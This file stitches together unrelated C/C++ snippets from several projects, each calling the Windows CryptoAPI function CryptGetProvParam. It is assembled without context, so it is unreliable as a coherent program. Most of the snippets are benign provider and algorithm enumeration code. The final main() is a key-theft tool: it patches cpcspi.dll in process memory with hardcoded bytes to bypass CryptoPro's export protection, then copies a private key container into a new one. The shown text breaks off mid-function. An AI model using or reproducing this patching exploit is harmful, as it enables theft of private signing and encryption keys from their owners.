/**
* Returns the next key container for the current user
*/
const char *get_next_container()
{
static int flag = CRYPT_FIRST;
static char *item = NULL;
static int mlen = 0;
int rval, len;
if (flag == CRYPT_FIRST) {
rval = CryptGetProvParam(base_prov, PP_ENUMCONTAINERS, NULL,
&mlen, CRYPT_FIRST);
if (!rval) {
return NULL;
}
item = malloc(mlen);
if (item == NULL) {
syserror(0, 0, "malloc failed!");
exit(1);
}
}
len = mlen;
rval = CryptGetProvParam(base_prov, PP_ENUMCONTAINERS, item, &len, flag);
if (!rval) {
if (GetLastError() != ERROR_NO_MORE_ITEMS) {
mserror("CryptGetProvParam failed");
}
flag = CRYPT_FIRST;
free(item);
item = NULL;
return NULL;
}
flag = CRYPT_NEXT;
return item;
}
static void test_container_sd(void)
{
HCRYPTPROV prov;
SECURITY_DESCRIPTOR *sd;
DWORD len, err;
BOOL ret;
ret = CryptAcquireContextA(&prov, "winetest", "Microsoft Enhanced Cryptographic Provider v1.0",
PROV_RSA_FULL, CRYPT_MACHINE_KEYSET|CRYPT_NEWKEYSET);
ok(ret, "got %u\n", GetLastError());
len = 0;
SetLastError(0xdeadbeef);
ret = CryptGetProvParam(prov, PP_KEYSET_SEC_DESCR, NULL, &len, OWNER_SECURITY_INFORMATION);
err = GetLastError();
ok(ret, "got %u\n", err);
ok(err == ERROR_INSUFFICIENT_BUFFER || broken(err == ERROR_INVALID_PARAMETER), "got %u\n", err);
ok(len, "expected len > 0\n");
sd = HeapAlloc(GetProcessHeap(), 0, len);
ret = CryptGetProvParam(prov, PP_KEYSET_SEC_DESCR, (BYTE *)sd, &len, OWNER_SECURITY_INFORMATION);
ok(ret, "got %u\n", GetLastError());
HeapFree(GetProcessHeap(), 0, sd);
ret = CryptReleaseContext(prov, 0);
ok(ret, "got %u\n", GetLastError());
ret = CryptAcquireContextA(&prov, "winetest", "Microsoft Enhanced Cryptographic Provider v1.0",
PROV_RSA_FULL, CRYPT_MACHINE_KEYSET|CRYPT_DELETEKEYSET);
ok(ret, "got %u\n", GetLastError());
}
BOOL kull_m_crypto_close_hprov_delete_container(HCRYPTPROV hProv)
{
BOOL status = FALSE;
DWORD provtype, szLen = 0;
PSTR container, provider;
if(CryptGetProvParam(hProv, PP_CONTAINER, NULL, &szLen, 0))
{
if(container = (PSTR) LocalAlloc(LPTR, szLen))
{
if(CryptGetProvParam(hProv, PP_CONTAINER, (LPBYTE) container, &szLen, 0))
{
if(CryptGetProvParam(hProv, PP_NAME, NULL, &szLen, 0))
{
if(provider = (PSTR) LocalAlloc(LPTR, szLen))
{
if(CryptGetProvParam(hProv, PP_NAME, (LPBYTE) provider, &szLen, 0))
{
szLen = sizeof(DWORD);
if(CryptGetProvParam(hProv, PP_PROVTYPE, (LPBYTE) &provtype, &szLen, 0))
{
CryptReleaseContext(hProv, 0);
status = CryptAcquireContextA(&hProv, container, provider, provtype, CRYPT_DELETEKEYSET);
}
}
LocalFree(provider);
}
}
LocalFree(container);
}
}
}
return status;
}
QByteArray QCSPPrivate::provParam( HCRYPTPROV h, DWORD param, DWORD flags )
{
DWORD size = 0;
if( !CryptGetProvParam( h, param, 0, &size, flags ) )
return QByteArray();
QByteArray data( size, 0 );
if( !CryptGetProvParam( h, param, LPBYTE(data.data()), &size, flags ) )
return QByteArray();
return data;
}
static char *DigiCrypt_GetDefaultKeyContainerName(char *psCSPName)
{
char *psRes = NULL;
HCRYPTPROV hProvider;
BOOL fRes;
DWORD dwFlags = CRYPT_VERIFYCONTEXT;
BYTE pbData[dNAME_ITEM_LEN+1];
DWORD cbData = dNAME_ITEM_LEN;
DWORD dwError;
DWORD dwProvType;
ZeroMemory(pbData,cbData);
ZeroMemory(oG_sKeyContainerName,1000);
dwProvType = DigiCrypt_FindContext_GetCSPType(psCSPName);
//LOG("GetDefaultKeyContainerName CSP=%s",psCSPName);
if (lstrcmp(psCSPName,psData_Extra_CSP_Name) != 0)
fRes = CryptAcquireContext(&hProvider,NULL,psCSPName,dwProvType, CRYPT_SILENT);
else
fRes = CryptAcquireContext(&hProvider,NULL,psCSPName,dwProvType, CRYPT_VERIFYCONTEXT);
if (fRes == FALSE && dwFlags == CRYPT_SILENT) {
//by description must be CRYPT_VERIFYCONTEXT
fRes = CryptAcquireContext(&hProvider,NULL,psCSPName,dwProvType, CRYPT_VERIFYCONTEXT);
}
if (fRes == TRUE) {
cbData = dNAME_ITEM_LEN;
fRes = CryptGetProvParam(hProvider, PP_CONTAINER, pbData, &cbData, 0);
/*if (fRes == FALSE)
dwError = GetLastError();*/
}
//Some cards should not have default key container
//let try to find key containers on the card.
if (fRes == FALSE) {
fRes=CryptGetProvParam(hProvider, PP_ENUMCONTAINERS, pbData, &cbData,CRYPT_FIRST);
if (fRes == FALSE)
dwError = GetLastError();
}
if (fRes == TRUE) {
//oG_hProvider = hProvider;
strncpy(oG_sKeyContainerName, (char *) pbData, sizeof(oG_sKeyContainerName));
//psRes = oG_sKeyContainerName;
DigiCrypt_ChangeContainerName(oG_sKeyContainerName);
} else {
}
if (psRes != NULL)
LOG("GetDefaultKeyContainerName CSP=%s",psCSPName);
else
LOG("GetDefaultKeyContainerName Not found");
if (hProvider != 0)
CryptReleaseContext(hProvider, 0);
return(oG_sKeyContainerName);
}
/* Group of code that is called more then once in keypairgen_putcert() */
int getProvInfo(HCRYPTPROV hProv)
{
BYTE pbData[500];
int cbData;
DWORD provType;
DWORD err;
int errors = 0;
printf("Provider info:\n");
// Get the PP_NAME param
if(!CryptGetProvParam(hProv, PP_NAME, NULL, &cbData, 0)) {
err = GetLastError();
printf("ERR: CryptGetProvParam(PP_NAME length): %s (0x%0x)\n", e2str(err), err);
errors++;
}
else if(!CryptGetProvParam(hProv, PP_NAME, pbData, &cbData, 0)) {
err = GetLastError();
printf("ERR: CryptGetProvParam(PP_NAME): %s (0x%0x)\n", e2str(err), err);
errors++;
}
else
printf(" PP_NAME: %s\n", pbData);
// Get the PP_UNIQUE_CONTAINER param
if(!CryptGetProvParam(hProv, PP_UNIQUE_CONTAINER, NULL, &cbData, 0)) {
err = GetLastError();
printf("ERR: CryptGetProvParam(PP_UNIQUE_CONTAINER length): %s (0x%0x)\n", e2str(err), err);
errors++;
}
else if(!CryptGetProvParam(hProv, PP_UNIQUE_CONTAINER, pbData, &cbData, 0)) {
err = GetLastError();
printf("ERR: CryptGetProvParam(PP_UNIQUE_CONTAINER): %s (0x%0x)\n", e2str(err), err);
errors++;
}
else
printf(" PP_UNIQUE_CONTAINER: %s\n", pbData);
// Get the PP_PROVTYPE param
if(!CryptGetProvParam(hProv, PP_PROVTYPE, NULL, &provType, 0)) {
err = GetLastError();
printf("ERR: CryptGetProvParam(PP_PROVTYPE): %s (0x%0x)\n", e2str(err), err);
errors++;
}
else
printf(" PP_PROVTYPE: 0x%0x\n", provType);
return errors;
}
static char *DigiCrypt_GetDefaultKeyContainerNameSimple(char *psCSPName)
{
char *psRes = NULL;
HCRYPTPROV hProvider=0;
BOOL fRes;
DWORD dwFlags = 0;
BYTE pbData[dNAME_ITEM_LEN+1];
DWORD cbData = dNAME_ITEM_LEN;
DWORD dwError;
fRes = OpenProvider(&hProvider, psCSPName, dwFlags);
//fRes = CryptAcquireContext(&hProvider,NULL,psCSPName,PROV_RSA_SIG, dwFlags);
if (fRes == TRUE)
{
fRes = CryptGetProvParam(hProvider, PP_CONTAINER, pbData, &cbData, 0);
if (fRes == FALSE)
dwError = GetLastError();
}
if (fRes == TRUE)
{
lstrcpy(oG_sKeyContainerName,(const char *)pbData);
psRes = oG_sKeyContainerName;
DigiCrypt_ChangeContainerName(oG_sKeyContainerName);
}
if (hProvider != 0)
CryptReleaseContext(hProvider, 0);
return(psRes);
}
/**
* Returns whether a particular ALG_ID is available in the current CSP
*/
static int alg_found(ALG_ID alg)
{
PROV_ENUMALGS alg_info;
int alg_info_len, flag, found_alg;
found_alg = 0;
alg_info_len = sizeof(alg_info);
flag = CRYPT_FIRST;
while (CryptGetProvParam(base_prov, PP_ENUMALGS, (BYTE *)&alg_info,
&alg_info_len, flag) && (!found_alg)) {
if (alg_info.aiAlgid == alg) {
found_alg = 1;
}
alg_info_len = sizeof(alg_info);
flag = CRYPT_NEXT;
}
if (!found_alg) {
if (GetLastError() != ERROR_NO_MORE_ITEMS) {
mserror("CryptGetProvParam failed");
}
return 0;
} else {
return 1;
}
}
static char *DigiCrypt_GetFirstAllowedCSPName(void)
{
char *psRes = NULL;
HKEY hKey = NULL;
LONG lRet=0;
DWORD dwIndex = 0;
BOOL fRes;
char sProvName[dSTRING_ITEM_LEN+1];
char sKeyNameBuf[dSTRING_ITEM_LEN+1];
HCRYPTPROV hProvide = 0;
DWORD dwBufLen;
FILETIME oTime;
//char buff[200];
BYTE pbData[dNAME_ITEM_LEN+1];
DWORD cbData=dNAME_ITEM_LEN+1;
DWORD dwProvType;
strncpy(sKeyNameBuf, psData_CSP_Path, sizeof(sKeyNameBuf));
lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE,sKeyNameBuf,0, KEY_READ, &hKey);
while (lRet == ERROR_SUCCESS) {
dwBufLen = dSTRING_ITEM_LEN;
lRet = RegEnumKeyEx(hKey,dwIndex,sProvName,&dwBufLen,NULL,NULL,0,&oTime);
if (lRet == ERROR_SUCCESS) {
if (lstrcmp(sProvName,psData_Ignore_CSP_Name) != 0) {
dwProvType = DigiCrypt_FindContext_GetCSPType(sProvName);
LOG("CSP %s",sProvName);
if (lstrcmp(sProvName,psData_Extra_CSP_Name) != 0)
fRes = OpenProvider(&hProvide, sProvName, CRYPT_SILENT);
else {
fRes = OpenProvider(&hProvide, sProvName, CRYPT_VERIFYCONTEXT);
//fRes = CryptAcquireContext(&hProvide,"SetCARDKeyContainer",sProvName,dwProvType, CRYPT_SILENT);
fRes = CryptAcquireContext(&hProvide,NULL,sProvName,dwProvType, CRYPT_VERIFYCONTEXT);
if(fRes) {
//the extra csp might give wrong answer. We should ask from provider, why.
//The following is the work-around -- try to lookup key container from the card.
//if the result is negative this is a not the csp what is needed.
fRes=CryptGetProvParam(hProvide, PP_ENUMCONTAINERS, pbData, &cbData,CRYPT_FIRST);
}
}
if (fRes == TRUE) { // && dwProvType == 2)
//set global values
LOG("CSP %s accepted",sProvName);
strncpy(oG_sCSPName, sProvName, sizeof(oG_sCSPName));
CryptReleaseContext(hProvide, 0);
psRes = oG_sCSPName;
break;
}
}
}
//hProvide = 0;
CryptReleaseContext(hProvide, 0);
dwIndex++;
}
if (hKey != NULL)
RegCloseKey(hKey);
return(psRes);
}
ArsCadena TarjetaCAPI::getEtiqueta() const
{
char buff[256];
DWORD len = 256;
ArsCadena ret;
if ( isConectado() )
{
if ( CryptGetProvParam(getHandle(), PP_NAME, buff, &len, 0) )
ret = buff;
}
return (ret);
}
int listProvAlgos(const char *containerNumber)
{
char provName[PROVIDER_BUFFER_SIZE];
char contName[CONTAINER_BUFFER_SIZE];
DWORD dwKeyUsage;
HCRYPTPROV hProv = 0;
DWORD dwFlags = CRYPT_FIRST;
PROV_ENUMALGS_EX xProvAlgEx;
DWORD dwDataLen = sizeof(xProvAlgEx);
DWORD err;
/* Get the provider name, container name and keyusage (SIGN or KEYEX) */
if (listMyCerts(containerNumber, provName, contName, &dwKeyUsage))
return 1;
if (dwKeyUsage == -1) {
printf("Container %d not present, exiting\n", atoi(containerNumber));
return 1;
}
/* Acquire the provider handle */
if(!CryptAcquireContext(&hProv, contName, provName, PROV_RSA_FULL, 0)) {
err = GetLastError();
printf("ERR: CryptAcquireContext: %s (0x%0x)\n", e2str(err), err);
return 1;
}
printf("Algo's for key \"%s\" in provider \"%s\":\n", contName, provName);
while(CryptGetProvParam(hProv, PP_ENUMALGS_EX, (BYTE *) &xProvAlgEx, &dwDataLen, dwFlags))
{
printf(" AlgID: 0x%0x, Keylen default: %d, min: %d, max: %d, prots: %d, name: %s\n",
xProvAlgEx.aiAlgid, xProvAlgEx.dwDefaultLen, xProvAlgEx.dwMinLen,
xProvAlgEx.dwMaxLen, xProvAlgEx.dwProtocols, xProvAlgEx.szName);
dwFlags = 0;
dwDataLen = dwDataLen = sizeof(xProvAlgEx);
}
err = GetLastError();
if (err != ERROR_NO_MORE_ITEMS)
printf("ERR: last CryptGetProvParam() call returned %s (0x%0x)\n", e2str(err), err);
if(!CryptReleaseContext(hProv, 0)) {
err = GetLastError();
printf("ERR: CryptReleaseContext(): %s (0x%0x)\n", e2str(err), err);
}
return 0;
}
void
CryptoProxy::verifyCryptoAlgs()
{
bool isMd5Supported = false;
bool isSha1Supported = false;
bool isAesSupported = false;
DWORD flags = CRYPT_FIRST;
for (;;)
{
PROV_ENUMALGS algs;
DWORD dataLen = sizeof(algs);
if (!CryptGetProvParam(impl->provider, PP_ENUMALGS,
reinterpret_cast<BYTE*>(&algs), &dataLen, flags))
{
DWORD err = GetLastError();
if (err == ERROR_NO_MORE_ITEMS)
break; // finished
// another error - throw
throw WinApiError("CryptGetProvParams", err);
}
switch (algs.aiAlgid)
{
case CALG_MD5:
isMd5Supported = true;
break;
case CALG_SHA:
isSha1Supported = true;
break;
case CALG_AES_128:
isAesSupported = true;
break;
}
flags &= ~CRYPT_FIRST;
}
if (!isMd5Supported)
throw runtime_error("Crypto: MD5 is not supported");
if (!isSha1Supported)
throw runtime_error("Crypto: SHA-1 is not supported");
if (!isAesSupported)
throw runtime_error("Crypto: AES-128 is not supported");
}
bool AlmacenCertificadoCAPI::CorrespondeCertificadoConCSP(PCCERT_CONTEXT cert) const
{
char buffNombreCSP[256];
DWORD len = 256;
ArsCadena nombreCSP;
ArsCadena cspCertificado;
bool ok;
if (csp != 0)
{
CryptGetProvParam(csp, PP_NAME, buffNombreCSP, &len, 0);
nombreCSP = buffNombreCSP;
cspCertificado = CertCAPI::GetNombreCSP(cert);
ok = (cspCertificado == nombreCSP);
}
else
ok = true;
return (ok);
}
/*-
* _gnutls_privkey_import_system:
* @pkey: The private key
* @url: The URL of the key
*
* This function will import the given private key to the abstract
* #gnutls_privkey_t type.
*
* Returns: On success, %GNUTLS_E_SUCCESS (0) is returned, otherwise a
* negative error value.
*
* Since: 3.4.0
*
-*/
int _gnutls_privkey_import_system_url(gnutls_privkey_t pkey, const char *url)
{
#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_APP)
return gnutls_assert_val(GNUTLS_E_UNIMPLEMENTED_FEATURE);
#else
uint8_t id[MAX_WID_SIZE];
HCERTSTORE store = NULL;
size_t id_size;
const CERT_CONTEXT *cert = NULL;
CRYPT_HASH_BLOB blob;
CRYPT_KEY_PROV_INFO *kpi = NULL;
NCRYPT_KEY_HANDLE nc = NULL;
HCRYPTPROV hCryptProv = NULL;
NCRYPT_PROV_HANDLE sctx = NULL;
DWORD kpi_size;
SECURITY_STATUS r;
int ret, enc_too = 0;
WCHAR algo_str[64];
DWORD algo_str_size = 0;
priv_st *priv;
DWORD i, dwErrCode = 0;
if (ncrypt_init == 0)
return gnutls_assert_val(GNUTLS_E_UNIMPLEMENTED_FEATURE);
if (url == NULL)
return gnutls_assert_val(GNUTLS_E_INVALID_REQUEST);
priv = gnutls_calloc(1, sizeof(*priv));
if (priv == NULL)
return gnutls_assert_val(GNUTLS_E_MEMORY_ERROR);
id_size = sizeof(id);
ret = get_id(url, id, &id_size, 0);
if (ret < 0)
return gnutls_assert_val(ret);
blob.cbData = id_size;
blob.pbData = id;
store = CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, 0, CERT_SYSTEM_STORE_CURRENT_USER, L"MY");
if (store == NULL) {
gnutls_assert();
ret = GNUTLS_E_FILE_ERROR;
goto cleanup;
}
cert = CertFindCertificateInStore(store,
X509_ASN_ENCODING,
0,
CERT_FIND_KEY_IDENTIFIER,
&blob, NULL);
if (cert == NULL) {
char buf[64];
_gnutls_debug_log("cannot find ID: %s from %s\n",
_gnutls_bin2hex(id, id_size,
buf, sizeof(buf), NULL), url);
ret = gnutls_assert_val(GNUTLS_E_REQUESTED_DATA_NOT_AVAILABLE);
goto cleanup;
}
kpi_size = 0;
r = CertGetCertificateContextProperty(cert, CERT_KEY_PROV_INFO_PROP_ID,
NULL, &kpi_size);
if (r == 0) {
_gnutls_debug_log("error in getting context: %d from %s\n",
(int)GetLastError(), url);
ret = gnutls_assert_val(GNUTLS_E_REQUESTED_DATA_NOT_AVAILABLE);
goto cleanup;
}
kpi = gnutls_malloc(kpi_size);
if (kpi == NULL) {
gnutls_assert();
ret = GNUTLS_E_MEMORY_ERROR;
goto cleanup;
}
r = CertGetCertificateContextProperty(cert, CERT_KEY_PROV_INFO_PROP_ID,
kpi, &kpi_size);
if (r == 0) {
_gnutls_debug_log("error in getting context: %d from %s\n",
(int)GetLastError(), url);
ret = gnutls_assert_val(GNUTLS_E_REQUESTED_DATA_NOT_AVAILABLE);
goto cleanup;
}
r = pNCryptOpenStorageProvider(&sctx, kpi->pwszProvName, 0);
if (!FAILED(r)) { /* if this works carry on with CNG */
r = pNCryptOpenKey(sctx, &nc, kpi->pwszContainerName, 0, 0);
if (FAILED(r)) {
ret =
gnutls_assert_val
(GNUTLS_E_REQUESTED_DATA_NOT_AVAILABLE);
goto cleanup;
}
r = pNCryptGetProperty(nc, NCRYPT_ALGORITHM_PROPERTY,
(BYTE *) algo_str, sizeof(algo_str),
&algo_str_size, 0);
if (FAILED(r)) {
ret =
gnutls_assert_val
(GNUTLS_E_REQUESTED_DATA_NOT_AVAILABLE);
goto cleanup;
}
if (StrCmpW(algo_str, BCRYPT_RSA_ALGORITHM) == 0) {
priv->pk = GNUTLS_PK_RSA;
priv->sign_algo = GNUTLS_SIGN_RSA_SHA256;
enc_too = 1;
} else if (StrCmpW(algo_str, BCRYPT_DSA_ALGORITHM) == 0) {
priv->pk = GNUTLS_PK_DSA;
priv->sign_algo = GNUTLS_SIGN_DSA_SHA1;
} else if (StrCmpW(algo_str, BCRYPT_ECDSA_P256_ALGORITHM) == 0) {
priv->pk = GNUTLS_PK_EC;
priv->sign_algo = GNUTLS_SIGN_ECDSA_SHA256;
} else if (StrCmpW(algo_str, BCRYPT_ECDSA_P384_ALGORITHM) == 0) {
priv->pk = GNUTLS_PK_EC;
priv->sign_algo = GNUTLS_SIGN_ECDSA_SHA384;
} else if (StrCmpW(algo_str, BCRYPT_ECDSA_P521_ALGORITHM) == 0) {
priv->pk = GNUTLS_PK_EC;
priv->sign_algo = GNUTLS_SIGN_ECDSA_SHA512;
} else {
_gnutls_debug_log("unknown key algorithm: %ls\n",
algo_str);
ret = gnutls_assert_val(GNUTLS_E_UNKNOWN_PK_ALGORITHM);
goto cleanup;
}
priv->nc = nc;
ret = gnutls_privkey_import_ext3(pkey, priv, cng_sign,
(enc_too !=
0) ? cng_decrypt : NULL,
cng_deinit, cng_info, 0);
if (ret < 0) {
gnutls_assert();
goto cleanup;
}
} else {
/* this should be CAPI */
_gnutls_debug_log
("error in opening CNG keystore: %x from %ls\n", (int)r,
kpi->pwszProvName);
if (CryptAcquireContextW(&hCryptProv,
kpi->pwszContainerName,
kpi->pwszProvName,
kpi->dwProvType, kpi->dwFlags)) {
for (i = 0; i < kpi->cProvParam; i++)
if (!CryptSetProvParam(hCryptProv,
kpi->rgProvParam[i].
dwParam,
kpi->rgProvParam[i].
pbData,
kpi->rgProvParam[i].
dwFlags)) {
dwErrCode = GetLastError();
break;
};
} else {
dwErrCode = GetLastError();
}
if (ERROR_SUCCESS != dwErrCode) {
_gnutls_debug_log
("error in getting cryptprov: %d from %s\n",
(int)GetLastError(), url);
ret =
gnutls_assert_val
(GNUTLS_E_REQUESTED_DATA_NOT_AVAILABLE);
goto cleanup;
}
{
BYTE buf[100 + sizeof(PROV_ENUMALGS_EX) * 2];
PROV_ENUMALGS_EX *pAlgo = (PROV_ENUMALGS_EX *) buf;
DWORD len = sizeof(buf);
if (CryptGetProvParam
(hCryptProv, PP_ENUMALGS_EX, buf, &len,
CRYPT_FIRST)) {
DWORD hash = 0;
do {
switch (pAlgo->aiAlgid) {
case CALG_RSA_SIGN:
priv->pk = GNUTLS_PK_RSA;
enc_too = 1;
break;
case CALG_DSS_SIGN:
priv->pk =
priv->pk ==
GNUTLS_PK_RSA ?
GNUTLS_PK_RSA :
GNUTLS_PK_DSA;
break;
case CALG_SHA1:
hash = 1;
break;
case CALG_SHA_256:
hash = 256;
break;
default:
break;
}
len = sizeof(buf); // reset the buffer size
} while (CryptGetProvParam
(hCryptProv, PP_ENUMALGS_EX, buf, &len,
CRYPT_NEXT));
if (priv->pk == GNUTLS_PK_DSA)
priv->sign_algo = GNUTLS_SIGN_DSA_SHA1;
else
priv->sign_algo =
(hash >
1) ? GNUTLS_SIGN_RSA_SHA256 :
GNUTLS_SIGN_RSA_SHA1;
}
}
priv->hCryptProv = hCryptProv;
priv->dwKeySpec = kpi->dwKeySpec;
ret = gnutls_privkey_import_ext3(pkey, priv, capi_sign,
(enc_too !=
0) ? capi_decrypt : NULL,
capi_deinit, capi_info, 0);
if (ret < 0) {
gnutls_assert();
goto cleanup;
}
}
ret = 0;
cleanup:
if (ret < 0) {
if (nc != 0)
pNCryptFreeObject(nc);
if (hCryptProv != 0)
CryptReleaseContext(hCryptProv, 0);
gnutls_free(priv);
}
if (sctx != 0)
pNCryptFreeObject(sctx);
gnutls_free(kpi);
if (cert != 0)
CertFreeCertificateContext(cert);
CertCloseStore(store, 0);
return ret;
#endif
}
static BOOL
initCrypt()
{
BYTE buffer[ 1024 ];
DWORD size, flags;
if ( ! CryptAcquireContext( &provider, NULL, NULL, ProvType, CRYPT_VERIFYCONTEXT ) )
{
fprintf( stderr, "CryptAcquireContext() failed: 0x%x\n", GetLastError() );
return( FALSE );
}
if ( ! CryptGenKey( provider, XchgKeyType, XchgKeyFlags, &xchgKey ) )
{
fprintf( stderr, "CryptGenKey() failed: 0x%x\n", GetLastError() );
return( FALSE );
}
for( flags = CRYPT_FIRST; ; flags = CRYPT_NEXT )
{
PROV_ENUMALGS_EX *info = (PROV_ENUMALGS_EX *)buffer;
size = sizeof( buffer );
if ( ! CryptGetProvParam( provider, PP_ENUMALGS_EX, buffer, &size, flags ) )
{
DWORD status = GetLastError();
if ( status == ERROR_NO_MORE_ITEMS ) break;
fprintf( stderr, "CryptGetProvParam() failed: 0x%x\n", GetLastError() );
return( FALSE );
}
switch( info->aiAlgid )
{
case CALG_RSA_KEYX : rsaMaxKey = max( rsaMaxKey, info->dwMaxLen ); break;
case CALG_AES_128 :
case CALG_AES_192 :
case CALG_AES_256 : aesMaxKey = max( aesMaxKey, info->dwMaxLen ); break;
}
}
if ( verbose )
{
struct pkb
{
PUBLICKEYSTRUC hdr;
RSAPUBKEY rsa;
BYTE mod[1];
} *rsaKey= (struct pkb *)buffer;
printf( "RSA Max Key Length: %d\n", rsaMaxKey );
printf( "AES Max Key Length: %d\n", aesMaxKey );
if ( ! CryptExportKey( xchgKey, 0, PUBLICKEYBLOB, 0, NULL, &size ) )
{
fprintf( stderr, "CryptExportKey() [1] failed: 0x%x\n", GetLastError() );
return( FALSE );
}
if ( size > sizeof( buffer ) )
{
fprintf( stderr, "CryptExportKey() requires %d bytes\n", size );
return( FALSE );
}
size = sizeof( buffer );
if ( ! CryptExportKey( xchgKey, 0, PUBLICKEYBLOB, 0, (BYTE *)rsaKey, &size ) )
{
fprintf( stderr, "CryptExportKey() [2] failed: 0x%x\n", GetLastError() );
return( FALSE );
}
printf( "Xchg Exp: %d\n", rsaKey->rsa.pubexp );
printf( "Xchg Mod: \n" );
hexDump( rsaKey->rsa.bitlen / 8, rsaKey->mod );
}
if ( rsaMaxKey < 1024 || aesMaxKey < 128 )
{
fprintf( stderr, "Invalid minimum key length\n" );
return( FALSE );
}
return( TRUE );
}
static PCCERT_CONTEXT DigiCrypt_SelectFromAllKeysCerts(HCRYPTPROV hProvider)
{
PCCERT_CONTEXT pCertContext = NULL;
HCRYPTPROV hProv;
BYTE pbData[dNAME_ITEM_LEN+1];
DWORD cbData = dNAME_ITEM_LEN;
DWORD dwFlag;
BOOL fRes;
BOOL fRelease = FALSE;
CRYPT_KEY_PROV_INFO* poKeyInfo = NULL;
char sContainer[dNAME_ITEM_LEN+1];
hProv = hProvider;
if (hProv == 0)
{
fRes = OpenProvider(&hProv, oG_sCSPName, CRYPT_VERIFYCONTEXT);
//fRes = CryptAcquireContext(&hProv,NULL,oG_sCSPName,PROV_RSA_FULL, CRYPT_VERIFYCONTEXT);
if (fRes == FALSE)
{
LOG("Find1 - Can't open provider");
return(pCertContext);
}
fRelease = TRUE;
}
dwFlag = CRYPT_FIRST;
fRes = TRUE;
while (fRes == TRUE)
{
cbData = dNAME_ITEM_LEN;
cbData = 0;
fRes = CryptGetProvParam(hProv, PP_ENUMCONTAINERS, NULL, &cbData, dwFlag);
if (fRes == TRUE)
fRes = CryptGetProvParam(hProv, PP_ENUMCONTAINERS, pbData, &cbData, dwFlag);
dwFlag = 0;
if (fRes == FALSE)
{
if (GetLastError() == ERROR_NO_MORE_ITEMS)
{
LOG("Find1 End");
fRes = TRUE;
break;
}
}
else
{
LOG("Find1 select certs from %s",(char *)pbData);
DigiCrypt_SelectCertsFromKeyContainer(hProv, (char *)pbData);
}
}
pCertContext = RunDlg_RunDlg();
//we have selected the cert, but do we know corresponding key?
//let change values of globals when these are different
if (DigiCrypt_GetContainerFromCert(pCertContext, sContainer, dNAME_ITEM_LEN) == TRUE)
{
lstrcpy(oG_sKeyContainerName,sContainer);
}
if (fRelease == TRUE)
CryptReleaseContext(hProv, 0);
return(pCertContext);
}
int main (int argc, char *argv[])
{
DWORD dwProvType = 75;
DWORD data_len = 0;
BYTE *oid = NULL;
DWORD dwBlobLen = 0;
DWORD cAlg = (ALG_CLASS_DATA_ENCRYPT | ALG_TYPE_BLOCK | 31);
LPCSTR SourceName = NULL;
LPCSTR Psdw = NULL;
HANDLE hCurrProc = GetCurrentProcess();
char patch[] = {0x80,0xbd,0x1c,0x00,0x00,0x00,0x98,0x75,0x07,0xc6,0x85,0x1c,0x00,0x00,0x00,0x9c,0x90,0x90,0x90,0x90,0x90,0x90}; ///!!!
int patchLen = sizeof(patch);
DWORD previous = 0;
DWORD writeAddr = 0x11BC2;// INITIALIZED with offset!!! //0x611E1BC2;
/// PARSE COMMAND PARAMETERS HERE
for (int n = 1;n < argc;n++) {
if (n+1 >= argc)
break;
if (strcmp(argv[n],"-p") == 0) {
Psdw = argv[++n];
}
if (strcmp(argv[n],"-s") == 0) {
SourceName = argv[++n];
}
}
if (!Psdw || !SourceName) {
printf("[!] Dude, u specified incorrect parameters :/\n\tUsage: %s -s <source container name> -p <container password>",argv[0]);
exit(1);
}
if(!CryptAcquireContextA(
&hProvResponder,
"\\\\.\\Registry\\DestCopy", //Hardcoded name for container we create!!!
NULL,
dwProvType,
CRYPT_NEWKEYSET | CRYPT_SILENT))
{
HandleError("Error during CryptAcquireContext");
}
if(!CryptAcquireContextA(
&hProvSender,
SourceName,
NULL,
dwProvType,
0))
{
HandleError("Error during CryptAcquireContext");
}
/// FIND ADDRESS TO PATCH
HMODULE hModules[1024];
DWORD needed;
if (EnumProcessModules(hCurrProc,hModules,1024,&needed)) {
for (int i = 0; i < (needed / sizeof(HMODULE)); i++ )
{
char szModName[1024];
if ( GetModuleFileNameA( hModules[i], szModName, sizeof(szModName)))
{
if (StrStrA(szModName, "cpcspi.dll")) {
writeAddr += (DWORD)hModules[i];
printf("[+] Address in memory for patching is '%08X'.\n",writeAddr);
break;
}
}
}
}
/// !!!
printf("[+] Now we patch process memory, patch size is '%i' bytes...",patchLen);
VirtualProtectEx(hCurrProc, (void*)writeAddr, 2, PAGE_EXECUTE_READWRITE, &previous);
WriteProcessMemory(hCurrProc, (void*)writeAddr, &patch, patchLen, NULL);
printf("Ok\n");
printf("[+] Now we export container '%s'...\n",SourceName);
if(!CryptGetProvParam(
hProvSender,
92,
NULL,
&data_len,
0))
{
HandleError("Error computing buffer length");
}
oid = (BYTE *)malloc( data_len );
if( !oid )
HandleError("Out of memory.");
if(!CryptGetProvParam(
hProvSender,
92,
oid,
&data_len,
0))
{
HandleError("Error during CryptGetProvParam");
}
if(!CryptSetProvParam(
hProvResponder,
92,
oid,
0 ))
{
free( oid );
HandleError("Error during CryptSetProvParam");
}
free( oid );
data_len = 0;
if(!CryptGetProvParam(
hProvSender,
93,
NULL,
&data_len,
0))
{
HandleError("Error computing buffer length");
}
/// SPECIFY PASSWORD FOR CONTAINER HERE
if(!CryptSetProvParam( hProvSender,PP_SIGNATURE_PIN,(LPBYTE)Psdw,0))
{
HandleError("Error during CryptSetProvParam");
}
oid = (BYTE *)malloc( data_len );
if( !oid )
HandleError("Out of memory");
if(!CryptGetProvParam(
hProvSender,
93,
oid,
&data_len,
0))
{
free( oid );
HandleError("Error during CryptGetProvParam");
}
if(!CryptSetProvParam(
hProvResponder,
93,
oid,
0 ))
{
free( oid );
HandleError("Error during CryptSetProvParam");
}
free( oid );
if(!CryptGetUserKey(
hProvSender,
AT_KEYEXCHANGE,
&hSenderKey ))
{
HandleError("Error during CryptGetUserKey private key");
}
if(!CryptGenKey(
hProvSender,
(ALG_CLASS_KEY_EXCHANGE | ALG_TYPE_DH | 37),
CRYPT_EXPORTABLE,
&hSenderEphemKey))
{
HandleError("ERROR -- CryptGenKey");
}
if(!CryptGenKey(
hProvResponder,
(ALG_CLASS_KEY_EXCHANGE | ALG_TYPE_DH | 37),
CRYPT_EXPORTABLE | CRYPT_PREGEN,
&hResponderEphemKey))
{
HandleError("ERROR -- CryptGenKey");
}
if(!CryptGetKeyParam(
hSenderEphemKey,
106,
NULL,
&dwBlobLen,
0))
{
HandleError("Error computing BLOB length");
}
pbKeyBlob = (BYTE*)malloc(dwBlobLen);
if(!pbKeyBlob)
HandleError("Out of memory");
